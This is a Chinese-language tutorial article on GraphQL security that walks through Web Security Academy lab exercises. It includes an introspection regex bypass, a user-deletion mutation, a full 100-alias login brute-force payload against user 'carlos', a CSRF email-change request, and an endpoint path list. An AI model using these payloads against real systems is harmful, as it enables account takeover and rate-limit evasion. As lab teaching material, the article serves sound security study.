文章前言
GraphQL是一种用于构建API的查询语言和运行时环境,它提供了一种灵活且高效的方式来获取和修改数据,随着GraphQL的流行和广泛采用,我们也需要认识到与其相关的安全问题和挑战,本文将概述GraphQL的安全问题并提供实用的建议和最佳实践以帮助开发人员和系统管理员确保他们的GraphQL实现在安全性方面得到充分保护,包括一些常见安全漏洞以及如何通过正确的配置和安全措施来减轻这些风险
基本介绍
GraphQL是一个为API通信设计的查询语言,它于2015年由Facebook开发并在2018年成为开放源代码项目,相比于传统的RESTful API,GraphQL提供了更灵活、高效和精确的数据查询和操作方式,它没有和任何特定数据库或者存储引擎绑定,而是依靠现有的代码和数据支撑
核心组成
GraphQL的核心组成部分包括以下几个方面:
-
查询语言(Query Language):GraphQL引入了一种灵活的查询语言,用于描述客户端对数据的需求,这种查询语言具有清晰的语法结构,允许客户端精确地指定所需的字段和关联关系并可以进行嵌套和别名操作,查询语言是与GraphQL交互的主要方式
-
类型系统(Type System):GraphQL使用类型系统来定义API的数据结构,类型系统允许开发人员定义对象类型、标量类型(例如:字符串、整数、布尔值等)和枚举类型并定义它们之间的关系,通过类型系统GraphQL能够在编译时检查查询的正确性并提供自动完成和文档生成等功能
-
解析器(Resolver):解析器是GraphQL的执行引擎中的关键组件,它负责将查询请求映射到相应的数据源并从数据源中提取所需的数据,解析器可以是针对特定数据源的自定义逻辑也可以是与现有数据层(例如:数据库)进行交互的逻辑,解析器的任务是根据查询的要求从数据源中获取数据并返回给客户端
-
GraphQL端点(GraphQL Endpoint):GraphQL端点是客户端与GraphQL API进行交互的入口点,客户端通过向GraphQL端点发送查询请求并获取所需的数据,GraphQL端点是一个HTTP接口,接收查询请求并将其传递给执行引擎进行处理,通常GraphQL端点是应用程序的一个特定URL,用于处理所有与GraphQL相关的请求
-
执行引擎(Execution Engine):执行引擎是GraphQL的核心组件,负责解析和执行查询请求,它接收客户端发送的查询请求并根据查询语言和类型系统的定义,逐步执行解析器来获取所需的数据,执行引擎将查询结果组装成一个响应并返回给客户端
数据结构
GraphQL定义了一组基本数据类型用于描述API的数据结构,这些基本数据类型包括标量类型(Scalar Types)和复杂类型(Complex Types)
标量类型(Scalar Types)
-
Int:表示整数类型的数据,例如:42
-
Float:表示浮点数类型的数据,例如:3.14
-
Boolean:表示布尔类型的数据,取值为true或false
-
String:表示字符串类型的数据,例如:"Hello, World!"
-
ID:表示唯一标识符类型的数据,通常用于唯一标识对象或实体
枚举类型(Enum Types)
枚举类型用于定义一组可能的取值,客户端只能从预定义的取值中选择,示例:
enum Role { USER, ADMIN, MODERATOR }列表类型(List Types)
列表类型表示一组具有相同类型的数据,在GraphQL查询中可以使用中括号[]来表示,示例:
[] 表示整数类型的列表非空类型(Non-Null Types)
非空类型表示字段或参数不能为空,使用感叹号"!"来标记,示例:
String! 表示字符串类型的字段或参数不能为空对象类型(Object Types)
对象类型表示具有一组字段的复杂类型,可以嵌套其他对象类型或标量类型,示例
type User {id: ID!name: Stringage: Int}
输入类型(Input Types)
输入类型用于表示作为参数传递给变更操作的数据结构可以包含标量类型、枚举类型或其他输入类型,示例:
input CreateUserInput {name: String!age: Int}
操作类型
GraphQL的主要操作包括查询(Query)、变更(Mutation)和订阅(Subscription),客户端通过Query从Service获取数据,通过Mutation向Service发起变更操作,通过Subscription向Service发起订阅请求并建立套接字链接,监听相关数据的变更
查询(Query)
查询是用于获取数据的操作,类似于传统的GET请求,通过查询操作,客户端可以指定需要获取的字段和关联关系并从服务器获取相应的数据,示例代码如下:
query {user(id: "123") {nameageposts {titlecontent}}}
变更(Mutation)
变更是用于修改数据的操作,相当于传统的POST、PUT或DELETE请求,通过变更操作,客户端可以向服务器发送数据并修改或创建相应的资源,示例代码如下所示:
mutation {createUser(input: { name: "John", age: 25 }) {idnameage}}
订阅(Subscription)
订阅是用于实时获取数据更新的操作,类似于WebSocket,通过订阅操作客户端可以订阅特定的事件或数据源并在事件发生或数据更新时接收相应的通知,示例代码如下所示:
subscription {newPost {titlecontentauthor {name}}}
内省查询
GraphQL的内省查询是一种用于获取GraphQL服务端提供的模式信息的特殊查询,通过内省查询客户端可以动态地查询和探索GraphQL模式,了解可用的类型、字段、关联和其他模式相关的元数据,GraphQL的内省查询使用特殊的元字段__schema和__type来执行,下面是对GraphQL内省查询的详细介绍和示例
通过__schema查询所有可用对象:
{__schema {types {name}}}
通过__type查询指定对象的所有字段:
{: "Film") {namefields {nametype {namekindofType {namekind}}}}}
服务发现
在我们对网站进行安全评估时我们可以多多注意下列路径,这将有助于我们发现关联的接口来确定目标站点支持graphql的查询方式
altairexplorergraphiqlgraphiql.cssgraphiql/finlandgraphiql.jsgraphiql.min.cssgraphiql.min.jsgraphiql.phpgraphqlgraphql/consolegraphql-explorergraphql.phpgraphql/schema.jsongraphql/schema.xmlgraphql/schema.yamlplaygroundsubscriptionsapi/graphqlgraphv1/altairv1/explorerv1/graphiqlv1/graphiql.cssv1/graphiql/finlandv1/graphiql.jsv1/graphiql.min.cssv1/graphiql.min.jsv1/graphiql.phpv1/graphqlv1/graphql/consolev1/graphql-explorerv1/graphql.phpv1/graphql/schema.jsonv1/graphql/schema.xmlv1/graphql/schema.yamlv1/playgroundv1/subscriptionsv1/api/graphqlv1/graphv2/altairv2/explorerv2/graphiqlv2/graphiql.cssv2/graphiql/finlandv2/graphiql.jsv2/graphiql.min.cssv2/graphiql.min.jsv2/graphiql.phpv2/graphqlv2/graphql/consolev2/graphql-explorerv2/graphql.phpv2/graphql/schema.jsonv2/graphql/schema.xmlv2/graphql/schema.yamlv2/playgroundv2/subscriptionsv2/api/graphqlv2/graphv3/altairv3/explorerv3/graphiqlv3/graphiql.cssv3/graphiql/finlandv3/graphiql.jsv3/graphiql.min.cssv3/graphiql.min.jsv3/graphiql.phpv3/graphqlv3/graphql/consolev3/graphql-explorerv3/graphql.phpv3/graphql/schema.jsonv3/graphql/schema.xmlv3/graphql/schema.yamlv3/playgroundv3/subscriptionsv3/api/graphqlv3/graphv4/altairv4/explorerv4/graphiqlv4/graphiql.cssv4/graphiql/finlandv4/graphiql.jsv4/graphiql.min.cssv4/graphiql.min.jsv4/graphiql.phpv4/graphqlv4/graphql/consolev4/graphql-explorerv4/graphql.phpv4/graphql/schema.jsonv4/graphql/schema.xmlv4/graphql/schema.yamlv4/playgroundv4/subscriptionsv4/api/graphqlv4/graph
安全风险
内省查询
内省是一个内置的GraphQL函数,它使您能够向服务器查询有关模式的信息,内省也有助于理解如何与GraphQL API交互,它还可能泄露潜在的敏感数据,例如:描述字段,在生产环境中禁用自省是最佳实践,但这一建议并不总是得到遵守,我们可以使用下面的简单查询来探测自省,如果启用了内省,响应将返回所有可用查询的名称
{"query": "{__schema{queryType{name}}}"}
在burpsuite中可以看到如下请求报文,此时查看GrpahQL时会给出查询语句,可以看到这里是"getAllBlogPosts"——获取所有的博客
随后我们查看首页的博客的时候会发现这里的id序列出现变化
随后我们更改id序列值为全部博客中缺少的序列值3并重新发送数据包
从上面可以看到虽然获取到了id为3的报文信息,但是这里面并没有对应的密码字段值,随后我们复制请求URL并将其在INFO QL中进行分析获取到字段值
随后在报文中添加字段"postPassword"并重新发送报文
内省绕过
如果无法为正在测试的API运行内省查询,那么我们可以尝试在__schema关键字之后插入特殊字符,在开发人员禁用内省时,他们可以大多都是通过正则表达式在查询中排除__schema关键字,我们可以尝试空格、换行和逗号等字符,因为它们被GraphQL忽略但不被有缺陷的正则表达式忽略,因此如果开发人员只排除了__schema,那么下面的内省查询将不会被排除
{"query": "query{__schema{queryType{name}}}"}
如果这不起作用,我们可以尝试通过替代请求方法运行探测器,因为内省可能仅在POST上被禁用,尝试GET请求或内容类型为x-www-form-urlencoded的POST请求,下面的示例显示了通过GET发送的内省探测,带有URL编码的参数
GET /graphql?query=query%7B__schema%0A%7BqueryType%7Bname%7D%7D%7D在Repeater中向一些常见的GraphQL端点后缀发送请求并检查结果
发送/api请求时提示"Method Not Allowed"
更改请求方法为"GET"并重新发送数据包时会提示"Query not present"错误,这暗示可能有一个GraphQL端点响应此位置的GET请求
随后修改请求以包含通用查询,例如:
/api?query=query{__typename}
从上面可以看到这里不允许POST请求,所以我们直接更改请求方法为GET
随后使用URL编码的自省查询作为查询参数发送新请求
/api?query=query+IntrospectionQuery+%7B%0A++__schema+%7B%0A++++queryType+%7B%0D%0A++++++name%0D%0A++++%7D%0D%0A++++mutationType+%7B%0D%0A++++++name%0D%0A++++%7D%0D%0A++++subscriptionType+%7B%0D%0A++++++name%0D%0A++++%7D%0D%0A++++types+%7B%0D%0A++++++...FullType%0D%0A++++%7D%0D%0A++++directives+%7B%0D%0A++++++name%0D%0A++++++description%0D%0A++++++args+%7B%0D%0A++++++++...InputValue%0D%0A++++++%7D%0D%0A++++%7D%0D%0A++%7D%0D%0A%7D%0D%0A%0D%0Afragment+FullType+on+__Type+%7B%0D%0A++kind%0D%0A++name%0D%0A++description%0D%0A++fields%28includeDeprecated%3A+true%29+%7B%0D%0A++++name%0D%0A++++description%0D%0A++++args+%7B%0D%0A++++++...InputValue%0D%0A++++%7D%0D%0A++++type+%7B%0D%0A++++++...TypeRef%0D%0A++++%7D%0D%0A++++isDeprecated%0D%0A++++deprecationReason%0D%0A++%7D%0D%0A++inputFields+%7B%0D%0A++++...InputValue%0D%0A++%7D%0D%0A++interfaces+%7B%0D%0A++++...TypeRef%0D%0A++%7D%0D%0A++enumValues%28includeDeprecated%3A+true%29+%7B%0D%0A++++name%0D%0A++++description%0D%0A++++isDeprecated%0D%0A++++deprecationReason%0D%0A++%7D%0D%0A++possibleTypes+%7B%0D%0A++++...TypeRef%0D%0A++%7D%0D%0A%7D%0D%0A%0D%0Afragment+InputValue+on+__InputValue+%7B%0D%0A++name%0D%0A++description%0D%0A++type+%7B%0D%0A++++...TypeRef%0D%0A++%7D%0D%0A++defaultValue%0D%0A%7D%0D%0A%0D%0Afragment+TypeRef+on+__Type+%7B%0D%0A++kind%0D%0A++name%0D%0A++ofType+%7B%0D%0A++++kind%0D%0A++++name%0D%0A++++ofType+%7B%0D%0A++++++kind%0D%0A++++++name%0D%0A++++++ofType+%7B%0D%0A++++++++kind%0D%0A++++++++name%0D%0A++++++%7D%0D%0A++++%7D%0D%0A++%7D%0D%0A%7D%0D%0A
从回显内容中可以看到这里不允许内省,修改查询以在__schema后包含换行符并重新发送,例如:
/api?query=query+IntrospectionQuery+%7B%0D%0A++__schema%0a+%7B%0D%0A++++queryType+%7B%0D%0A++++++name%0D%0A++++%7D%0D%0A++++mutationType+%7B%0D%0A++++++name%0D%0A++++%7D%0D%0A++++subscriptionType+%7B%0D%0A++++++name%0D%0A++++%7D%0D%0A++++types+%7B%0D%0A++++++...FullType%0D%0A++++%7D%0D%0A++++directives+%7B%0D%0A++++++name%0D%0A++++++description%0D%0A++++++args+%7B%0D%0A++++++++...InputValue%0D%0A++++++%7D%0D%0A++++%7D%0D%0A++%7D%0D%0A%7D%0D%0A%0D%0Afragment+FullType+on+__Type+%7B%0D%0A++kind%0D%0A++name%0D%0A++description%0D%0A++fields%28includeDeprecated%3A+true%29+%7B%0D%0A++++name%0D%0A++++description%0D%0A++++args+%7B%0D%0A++++++...InputValue%0D%0A++++%7D%0D%0A++++type+%7B%0D%0A++++++...TypeRef%0D%0A++++%7D%0D%0A++++isDeprecated%0D%0A++++deprecationReason%0D%0A++%7D%0D%0A++inputFields+%7B%0D%0A++++...InputValue%0D%0A++%7D%0D%0A++interfaces+%7B%0D%0A++++...TypeRef%0D%0A++%7D%0D%0A++enumValues%28includeDeprecated%3A+true%29+%7B%0D%0A++++name%0D%0A++++description%0D%0A++++isDeprecated%0D%0A++++deprecationReason%0D%0A++%7D%0D%0A++possibleTypes+%7B%0D%0A++++...TypeRef%0D%0A++%7D%0D%0A%7D%0D%0A%0D%0Afragment+InputValue+on+__InputValue+%7B%0D%0A++name%0D%0A++description%0D%0A++type+%7B%0D%0A++++...TypeRef%0D%0A++%7D%0D%0A++defaultValue%0D%0A%7D%0D%0A%0D%0Afragment+TypeRef+on+__Type+%7B%0D%0A++kind%0D%0A++name%0D%0A++ofType+%7B%0D%0A++++kind%0D%0A++++name%0D%0A++++ofType+%7B%0D%0A++++++kind%0D%0A++++++name%0D%0A++++++ofType+%7B%0D%0A++++++++kind%0D%0A++++++++name%0D%0A++++++%7D%0D%0A++++%7D%0D%0A++%7D%0D%0A%7D%0D%0A
从上面可以看到响应现在包含了完整的内省细节,这是因为服务器被配置为排除与regex "__schema{"匹配的查询,该查询不再匹配,即使它仍然是有效的内省查询,随后我们保存响应报文的内容并使用InQL加载文件进行解析操作,可以获取到用户删除操作接口:
查询用户信息的接口:
根据用户ID信息检索用户,ID为1时,用户为administrator
GET /api?query=%71%75%65%72%79%20%7b%0a%20%20%20%20%67%65%74%55%73%65%72%28%69%64%3a%20%31%29%20%7b%0a%20%20%20%20%20%20%20%20%69%64%0a%20%20%20%20%20%20%20%20%75%73%65%72%6e%61%6d%65%0a%20%20%20%20%7d%0a%7d HTTP/1.1Host: 0afd00740480738384c5fe6e000400e8.web-security-academy.netCookie: session=Y9LKsJElXvfb0KwEWslV81d8JZACigJxSec-Ch-Ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://0afd00740480738384c5fe6e000400e8.web-security-academy.net/product?productId=1Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9
id为3时用户为carlos
GET /api?query=%71%75%65%72%79%20%7b%0a%20%20%20%20%67%65%74%55%73%65%72%28%69%64%3a%20%33%29%20%7b%0a%20%20%20%20%20%20%20%20%69%64%0a%20%20%20%20%20%20%20%20%75%73%65%72%6e%61%6d%65%0a%20%20%20%20%7d%0a%7d HTTP/1.1Host: 0afd00740480738384c5fe6e000400e8.web-security-academy.netCookie: session=Y9LKsJElXvfb0KwEWslV81d8JZACigJxSec-Ch-Ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://0afd00740480738384c5fe6e000400e8.web-security-academy.net/product?productId=1Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9
随后调用接口进行删除用户的操作
%6d%75%74%61%74%69%6f%6e%20%7b%0a%20%20%20%20%64%65%6c%65%74%65%4f%72%67%61%6e%69%7a%61%74%69%6f%6e%55%73%65%72%28%69%6e%70%75%74%3a%20%7b%69%64%3a%33%7d%29%20%7b%0a%20%20%20%20%20%20%20%20%75%73%65%72%20%7b%0a%20%20%20%20%20%20%20%20%20%20%20%20%69%64%0a%20%20%20%20%20%20%20%20%7d%0a%20%20%20%20%7d%0a%7d
此时进行查询操作会显示如下信息:
别名绕过
GraphQL对象不能包含同名的多个属性,别名使您能够通过显式命名希望API返回的属性来绕过此限制,您可以使用别名在一个请求中返回同一类型对象的多个实例,虽然别名旨在限制需要进行的API调用的数量,但它们也可以用于强制GraphQL端点,许多端点将有某种速率限制以防止暴力攻击,一些速率限制器的工作基于接收到的HTTP请求的数量,而不是在端点上执行的操作的数量,因为别名有效地使您能够在单个HTTP消息中发送多个查询,所以它们可以绕过此限制,下面的简化示例显示了一系列别名查询,这些查询检查商店折扣代码是否有效,此操作可能会绕过速率限制,因为它是一个HTTP请求,即使它可能会被用于同时检查大量折扣代码
query isValidDiscount($code: Int) {isvalidDiscount(code:$code){valid}isValidDiscount2:isValidDiscount(code:$code){valid}isValidDiscount3:isValidDiscount(code:$code){valid}}
在Burpsuite中可以看到此时的用户登录凭据是通过graphql的方式进行提交的:
在发送多个请求之后会看到频次限制的提示:
随后我们在GraphQL选项卡中创建一个请求,该请求使用别名在一条消息中发送多个登录,构建请求时请记住以下几点:
-
别名列表包含在{}类型中
-
每个别名都应该具有用户名carlos和与身份验证列表不同的密码
-
如果要修改发送给Repeater的请求,请在发送之前从请求中删除变量dictionary和operationName字段
-
您可以从Repeater的Pretty选项卡执行此操作
确保每个别名都请求success字段,如下面的简化示例所示:
mutation {bruteforce0:login(input:{password: "123456", username: "carlos"}) {tokensuccess}bruteforce1:login(input:{password: "password", username: "carlos"}) {tokensuccess}...bruteforce99:login(input:{password: "12345678", username: "carlos"}) {tokensuccess}}
这里我们使用靶场提供的载荷:
copy(`123456,password,12345678,qwerty,123456789,12345,1234,111111,1234567,dragon,123123,baseball,abc123,football,monkey,letmein,shadow,master,666666,qwertyuiop,123321,mustang,1234567890,michael,654321,superman,1qaz2wsx,7777777,121212,000000,qazwsx,123qwe,killer,trustno1,jordan,jennifer,zxcvbnm,asdfgh,hunter,buster,soccer,harley,batman,andrew,tigger,sunshine,iloveyou,2000,charlie,robert,thomas,hockey,ranger,daniel,starwars,klaster,112233,george,computer,michelle,jessica,pepper,1111,zxcvbn,555555,11111111,131313,freedom,777777,pass,maggie,159753,aaaaaa,ginger,princess,joshua,cheese,amanda,summer,love,ashley,nicole,chelsea,biteme,matthew,access,yankees,987654321,dallas,austin,thunder,taylor,matrix,mobilemail,mom,monitor,monitoring,montana,moon,moscow`.split(',').map((element,index)=>`bruteforce$index:login(input:{password: "$password", username: "carlos"}) {tokensuccess}`.replaceAll('$index',index).replaceAll('$password',element)).join('n'));console.log("The query has been copied to your clipboard.");
在浏览器一侧进行一个简单的构造:
bruteforce0:login(input:{password: "123456", username: "carlos"}) {tokensuccess}bruteforce1:login(input:{password: "password", username: "carlos"}) {tokensuccess}bruteforce2:login(input:{password: "12345678", username: "carlos"}) {tokensuccess}bruteforce3:login(input:{password: "qwerty", username: "carlos"}) {tokensuccess}bruteforce4:login(input:{password: "123456789", username: "carlos"}) {tokensuccess}bruteforce5:login(input:{password: "12345", username: "carlos"}) {tokensuccess}bruteforce6:login(input:{password: "1234", username: "carlos"}) {tokensuccess}bruteforce7:login(input:{password: "111111", username: "carlos"}) {tokensuccess}bruteforce8:login(input:{password: "1234567", username: "carlos"}) {tokensuccess}bruteforce9:login(input:{password: "dragon", username: "carlos"}) {tokensuccess}bruteforce10:login(input:{password: "123123", username: "carlos"}) {tokensuccess}bruteforce11:login(input:{password: "baseball", username: "carlos"}) {tokensuccess}bruteforce12:login(input:{password: "abc123", username: "carlos"}) {tokensuccess}bruteforce13:login(input:{password: "football", username: "carlos"}) {tokensuccess}bruteforce14:login(input:{password: "monkey", username: "carlos"}) {tokensuccess}bruteforce15:login(input:{password: "letmein", username: "carlos"}) {tokensuccess}bruteforce16:login(input:{password: "shadow", username: "carlos"}) {tokensuccess}bruteforce17:login(input:{password: "master", username: "carlos"}) {tokensuccess}bruteforce18:login(input:{password: "666666", username: "carlos"}) {tokensuccess}bruteforce19:login(input:{password: "qwertyuiop", username: "carlos"}) {tokensuccess}bruteforce20:login(input:{password: "123321", username: "carlos"}) {tokensuccess}bruteforce21:login(input:{password: "mustang", username: "carlos"}) {tokensuccess}bruteforce22:login(input:{password: "1234567890", username: "carlos"}) {tokensuccess}bruteforce23:login(input:{password: "michael", username: "carlos"}) {tokensuccess}bruteforce24:login(input:{password: "654321", username: "carlos"}) {tokensuccess}bruteforce25:login(input:{password: "superman", username: "carlos"}) {tokensuccess}bruteforce26:login(input:{password: "1qaz2wsx", username: "carlos"}) {tokensuccess}bruteforce27:login(input:{password: "7777777", username: "carlos"}) {tokensuccess}bruteforce28:login(input:{password: "121212", username: "carlos"}) {tokensuccess}bruteforce29:login(input:{password: "000000", username: "carlos"}) {tokensuccess}bruteforce30:login(input:{password: "qazwsx", username: "carlos"}) {tokensuccess}bruteforce31:login(input:{password: "123qwe", username: "carlos"}) {tokensuccess}bruteforce32:login(input:{password: "killer", username: "carlos"}) {tokensuccess}bruteforce33:login(input:{password: "trustno1", username: "carlos"}) {tokensuccess}bruteforce34:login(input:{password: "jordan", username: "carlos"}) {tokensuccess}bruteforce35:login(input:{password: "jennifer", username: "carlos"}) {tokensuccess}bruteforce36:login(input:{password: "zxcvbnm", username: "carlos"}) {tokensuccess}bruteforce37:login(input:{password: "asdfgh", username: "carlos"}) {tokensuccess}bruteforce38:login(input:{password: "hunter", username: "carlos"}) {tokensuccess}bruteforce39:login(input:{password: "buster", username: "carlos"}) {tokensuccess}bruteforce40:login(input:{password: "soccer", username: "carlos"}) {tokensuccess}bruteforce41:login(input:{password: "harley", username: "carlos"}) {tokensuccess}bruteforce42:login(input:{password: "batman", username: "carlos"}) {tokensuccess}bruteforce43:login(input:{password: "andrew", username: "carlos"}) {tokensuccess}bruteforce44:login(input:{password: "tigger", username: "carlos"}) {tokensuccess}bruteforce45:login(input:{password: "sunshine", username: "carlos"}) {tokensuccess}bruteforce46:login(input:{password: "iloveyou", username: "carlos"}) {tokensuccess}bruteforce47:login(input:{password: "2000", username: "carlos"}) {tokensuccess}bruteforce48:login(input:{password: "charlie", username: "carlos"}) {tokensuccess}bruteforce49:login(input:{password: "robert", username: "carlos"}) {tokensuccess}bruteforce50:login(input:{password: "thomas", username: "carlos"}) {tokensuccess}bruteforce51:login(input:{password: "hockey", username: "carlos"}) {tokensuccess}bruteforce52:login(input:{password: "ranger", username: "carlos"}) {tokensuccess}bruteforce53:login(input:{password: "daniel", username: "carlos"}) {tokensuccess}bruteforce54:login(input:{password: "starwars", username: "carlos"}) {tokensuccess}bruteforce55:login(input:{password: "klaster", username: "carlos"}) {tokensuccess}bruteforce56:login(input:{password: "112233", username: "carlos"}) {tokensuccess}bruteforce57:login(input:{password: "george", username: "carlos"}) {tokensuccess}bruteforce58:login(input:{password: "computer", username: "carlos"}) {tokensuccess}bruteforce59:login(input:{password: "michelle", username: "carlos"}) {tokensuccess}bruteforce60:login(input:{password: "jessica", username: "carlos"}) {tokensuccess}bruteforce61:login(input:{password: "pepper", username: "carlos"}) {tokensuccess}bruteforce62:login(input:{password: "1111", username: "carlos"}) {tokensuccess}bruteforce63:login(input:{password: "zxcvbn", username: "carlos"}) {tokensuccess}bruteforce64:login(input:{password: "555555", username: "carlos"}) {tokensuccess}bruteforce65:login(input:{password: "11111111", username: "carlos"}) {tokensuccess}bruteforce66:login(input:{password: "131313", username: "carlos"}) {tokensuccess}bruteforce67:login(input:{password: "freedom", username: "carlos"}) {tokensuccess}bruteforce68:login(input:{password: "777777", username: "carlos"}) {tokensuccess}bruteforce69:login(input:{password: "pass", username: "carlos"}) {tokensuccess}bruteforce70:login(input:{password: "maggie", username: "carlos"}) {tokensuccess}bruteforce71:login(input:{password: "159753", username: "carlos"}) {tokensuccess}bruteforce72:login(input:{password: "aaaaaa", username: "carlos"}) {tokensuccess}bruteforce73:login(input:{password: "ginger", username: "carlos"}) {tokensuccess}bruteforce74:login(input:{password: "princess", username: "carlos"}) {tokensuccess}bruteforce75:login(input:{password: "joshua", username: "carlos"}) {tokensuccess}bruteforce76:login(input:{password: "cheese", username: "carlos"}) {tokensuccess}bruteforce77:login(input:{password: "amanda", username: "carlos"}) {tokensuccess}bruteforce78:login(input:{password: "summer", username: "carlos"}) {tokensuccess}bruteforce79:login(input:{password: "love", username: "carlos"}) {tokensuccess}bruteforce80:login(input:{password: "ashley", username: "carlos"}) {tokensuccess}bruteforce81:login(input:{password: "nicole", username: "carlos"}) {tokensuccess}bruteforce82:login(input:{password: "chelsea", username: "carlos"}) {tokensuccess}bruteforce83:login(input:{password: "biteme", username: "carlos"}) {tokensuccess}bruteforce84:login(input:{password: "matthew", username: "carlos"}) {tokensuccess}bruteforce85:login(input:{password: "access", username: "carlos"}) {tokensuccess}bruteforce86:login(input:{password: "yankees", username: "carlos"}) {tokensuccess}bruteforce87:login(input:{password: "987654321", username: "carlos"}) {tokensuccess}bruteforce88:login(input:{password: "dallas", username: "carlos"}) {tokensuccess}bruteforce89:login(input:{password: "austin", username: "carlos"}) {tokensuccess}bruteforce90:login(input:{password: "thunder", username: "carlos"}) {tokensuccess}bruteforce91:login(input:{password: "taylor", username: "carlos"}) {tokensuccess}bruteforce92:login(input:{password: "matrix", username: "carlos"}) {tokensuccess}bruteforce93:login(input:{password: "mobilemail", username: "carlos"}) {tokensuccess}bruteforce94:login(input:{password: "mom", username: "carlos"}) {tokensuccess}bruteforce95:login(input:{password: "monitor", username: "carlos"}) {tokensuccess}bruteforce96:login(input:{password: "monitoring", username: "carlos"}) {tokensuccess}bruteforce97:login(input:{password: "montana", username: "carlos"}) {tokensuccess}bruteforce98:login(input:{password: "moon", username: "carlos"}) {tokensuccess}bruteforce99:login(input:{password: "moscow", username: "carlos"}) {tokensuccess}
随后先更改请求报文:
进行数据的替换操作:
随后进行一次批量数据查询:
找到为"true"的token凭据信息,此时对应的为bruteforce75,对应的密码为joshua
用户的密码凭据信息进行登录操作:
跨站请求
跨站点请求伪造(CSRF)漏洞使攻击者能够诱使用户执行他们不打算执行的操作,这是通过创建恶意网站来实现的,该网站会伪造对易受攻击应用程序的跨域请求,GraphQL可用作CSRF攻击的向量,攻击者利用该向量创建漏洞使受害者的浏览器以受害者用户的身份发送恶意查询。如果GraphQL端点不验证发送给它的请求的内容类型并且没有实现CSRF令牌,则可能会出现CSRF漏洞,只要内容类型得到验证,使用application/json内容类型的POST请求就可以防止伪造,在这种情况下即使受害者访问恶意网站,攻击者也无法让受害者的浏览器发送此请求,但是替代方法(例如:GET)或任何内容类型为x-www-form-urlencoded的请求都可以由浏览器发送,因此如果端点接受这些请求,则用户可能容易受到攻击,在这种情况下攻击者可能会精心利用漏洞向API发送恶意请求
打开Burp的浏览器,访问实验室并登录您的帐户,输入新的电子邮件地址,然后单击更新电子邮件
在Burp中转到Proxy>HTTP history并检查产生的请求,可以看到电子邮件更改是作为GraphQL发送的:
右键单击电子邮件更改请求,然后选择发送到Repeater,修改GraphQL查询以将电子邮件更改为另一个不同的地址,在回复中可以看到电子邮件再次更改,这表明您可以重用会话cookie来发送多个请求
随后我们将请求转换为内容类型为x-www-form-urlencoded的POST请求,为此右键单击请求并选择Change request method两次
从上面可以看到body已被删除,随后我们直接使用URL编码重新添加请求正文
query=%0A++++mutation+changeEmail%28%24input%3A+ChangeEmailInput%21%29+%7B%0A++++++++changeEmail%28input%3A+%24input%29+%7B%0A++++++++++++email%0A++++++++%7D%0A++++%7D%0A&operationName=changeEmail&variables=%7B%22input%22%3A%7B%22email%22%3A%22hacker%40hacker.com%22%7D%7D
随后生成CSRF载荷:
使用BurpSuite生成CSRF载荷:
随后在漏洞利用服务器中去托管漏洞载荷文件:
随后分发载荷成功完成对邮箱地址的更改操作:
插件应用
InQL v5.0提供的主要工具是一个可自定义的扫描程序,主要用于分析GraphQL端点或本地内省模式文件,它生成所有可能的查询和突变并以有组织的视图显示它们以进行彻底分析,扫描结果可以发送到Burp的中继器或入侵者工具进行进一步测试,同时它也引入了GQLSpection,它是一个多功能的CLI工具并以无头模式发送内省查询、解析结果、生成查询和运行兴趣点扫描,我们可以在Burpsuite的"Extensions->BApp Store"中选择插件并进行安装
例如在上面的示例中,我们在Burpsuite中发现了被检测到的GraphQL:
紧接着我们复制此URL到InQL中进行分析,发现此处存在getUser接口,此接口会返回用户的用户名、用户密码等信息
随后发送请求报文到repeat模块并更改id为0进行检索,可以发现此时放回的信息为空
随后我们获取到administrator的密码信息:
使用账户密码信息直接进行登录操作:
文末小结
本篇文章我们主要介绍了Graphql的基本概念、核心组成、数据结构、操作类型、安全风险、工具插件等内容,通过结合具体的靶场对Graphql的安全漏洞进行介绍,其中内省查询的利用和绕过方式值得深入思考,也是我们在安全测试中需要特别特别留意的一个测试的点,有时候多试试说不上就会有奇迹发生哦~
参考链接
https://graphql.cn/learn/
https://2fd.github.io/graphdoc/star-wars/
https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection
原文始发于微信公众号(七芒星实验室):Graphql安全问题概述
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论